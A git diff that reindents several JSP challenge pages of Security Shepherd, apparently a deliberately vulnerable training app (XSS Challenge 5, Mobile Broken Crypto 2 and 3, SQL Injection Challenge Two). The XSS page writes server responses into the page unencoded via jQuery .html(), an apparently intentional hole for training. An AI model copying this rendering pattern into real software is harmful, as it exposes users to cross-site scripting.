diff --git a/src/main/webapp/challenges/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671.jsp b/src/main/webapp/challenges/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671.jsp
index 52ffb13df..64e7dab78 100644
--- a/src/main/webapp/challenges/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671.jsp
+++ b/src/main/webapp/challenges/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671.jsp
@@ -1,141 +1,151 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * Cross Site Scripting Challenge 5
-     *
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * Cross Site Scripting Challenge 5
+ *
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ * 
+ * @author Mark Denihan
+ */
 
-    String levelName = new String("Cross Site Scripting Five");
-    String levelHash = "f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671";
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.xss." + levelHash, locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("challenge.challengeName");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
+ String levelName = new String("Cross Site Scripting Five");
+ String levelHash = "f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671";
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.xss." + levelHash, locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("challenge.challengeName");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ 		// Getting Session Variables
+		//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+		
+		String csrfToken = Encode.forHtml(tokenCookie.getValue());
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= Encode.forHtml(translatedLevelName) %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= Encode.forHtml(translatedLevelName) %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= Encode.forHtml(translatedLevelName) %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("challenge.form.instruction") %>;</td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="searchTerm"
-                           autocomplete="off" type="text"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.form.makePost") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= Encode.forHtml(translatedLevelName) %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("challenge.form.instruction") %>;</td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="searchTerm"
+						autocomplete="off" type="text" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.form.makePost") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
+						</p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var theSearchTerm = $("#searchTerm").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                dataType: "text",
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    searchTerm: theSearchTerm,
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var theSearchTerm = $("#searchTerm").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						dataType: "text",
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							searchTerm: theSearchTerm,
+							csrfToken: "<%= csrfToken %>"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/f5a3f19dd44b53c6d29dda65fa90791bb312a3044b3110acb8a65d165376bf34.jsp b/src/main/webapp/challenges/f5a3f19dd44b53c6d29dda65fa90791bb312a3044b3110acb8a65d165376bf34.jsp
index de2092785..7362ac78f 100644
--- a/src/main/webapp/challenges/f5a3f19dd44b53c6d29dda65fa90791bb312a3044b3110acb8a65d165376bf34.jsp
+++ b/src/main/webapp/challenges/f5a3f19dd44b53c6d29dda65fa90791bb312a3044b3110acb8a65d165376bf34.jsp
@@ -1,91 +1,98 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Sean Duggan
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Sean Duggan
+ */
 //No Quotes In level Name
-    String levelName = "Mobile Broken Crypto 3";
+String levelName = "Mobile Broken Crypto 3";
 //Alphanumeric Only
-    String levelHash = "fb5c9ce0f5539b737e534fd317befff7427f6610ed626dfd43abf35295f106bc";
+String levelHash = "fb5c9ce0f5539b737e534fd317befff7427f6610ed626dfd43abf35295f106bc";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.brokenCrypto.brokenCrypto", locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.brokenCrypto.brokenCrypto", locale);
+ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
 
 //Used more than once translations
-    String LevelName = bundle.getString("challenge3.challengeName");
-    String paragraph1 = bundle.getString("challenge3.para1");
+String LevelName = bundle.getString("challenge3.challengeName");
+String paragraph1 = bundle.getString("challenge3.para1");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= LevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= LevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= LevelName %>
-    </h2>
-    <p>
-        <%= paragraph1 %>
-        <br/> <br/>
-        <%= mobile.getString("mobileBlurb.vmLink.1") + " BrokenCrypto4.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= LevelName %></h2>
+		<p>
+			<%= paragraph1 %>
+			<br /> <br />
+			<%= mobile.getString("mobileBlurb.vmLink.1") + " BrokenCrypto4.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
 
-    </p>
-</div>
+		</p>
+	</div>
 
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/fb5c9ce0f5539b737e534fd317befff7427f6610ed626dfd43abf35295f106bc.jsp b/src/main/webapp/challenges/fb5c9ce0f5539b737e534fd317befff7427f6610ed626dfd43abf35295f106bc.jsp
index 1df68715c..26d3b4ed4 100644
--- a/src/main/webapp/challenges/fb5c9ce0f5539b737e534fd317befff7427f6610ed626dfd43abf35295f106bc.jsp
+++ b/src/main/webapp/challenges/fb5c9ce0f5539b737e534fd317befff7427f6610ed626dfd43abf35295f106bc.jsp
@@ -1,91 +1,98 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Sean Duggan
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Sean Duggan
+ */
 //No Quotes In level Name
-    String levelName = "Mobile Broken Crypto 2";
+String levelName = "Mobile Broken Crypto 2";
 //Alphanumeric Only
-    String levelHash = "fb5c9ce0f5539b737e534fd317befff7427f6610ed626dfd43abf35295f106bc";
+String levelHash = "fb5c9ce0f5539b737e534fd317befff7427f6610ed626dfd43abf35295f106bc";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.brokenCrypto.brokenCrypto", locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.brokenCrypto.brokenCrypto", locale);
+ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
 
 //Used more than once translations
-    String LevelName = bundle.getString("challenge2.challengeName");
-    String paragraph1 = bundle.getString("challenge2.para1");
+String LevelName = bundle.getString("challenge2.challengeName");
+String paragraph1 = bundle.getString("challenge2.para1");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= LevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= LevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= LevelName %>
-    </h2>
-    <p>
-        <%= paragraph1 %>
-        <br/> <br/>
-        <%= mobile.getString("mobileBlurb.vmLink.1") + " BrokenCrypto2.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= LevelName %></h2>
+		<p>
+			<%= paragraph1 %>
+			<br /> <br />
+			<%= mobile.getString("mobileBlurb.vmLink.1") + " BrokenCrypto2.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
 
-    </p>
-</div>
+		</p>
+	</div>
 
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b.jsp b/src/main/webapp/challenges/ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b.jsp
index 7bee9707f..54a6b5b8b 100644
--- a/src/main/webapp/challenges/ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b.jsp
+++ b/src/main/webapp/challenges/ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b.jsp
@@ -1,167 +1,175 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * SQL Injection Challenge Two
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * SQL Injection Challenge Two
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 
-    String levelName = "SQL Injection Challenge Two";
+String levelName = "SQL Injection Challenge Two";
 
-    String levelHash = "ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b";
+ String levelHash= "ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b";
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
 //Used more than once translations
-    String i18nLevelName = bundle.getString("challenge.challengeName");
+String i18nLevelName = bundle.getString("challenge.challengeName");
 
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
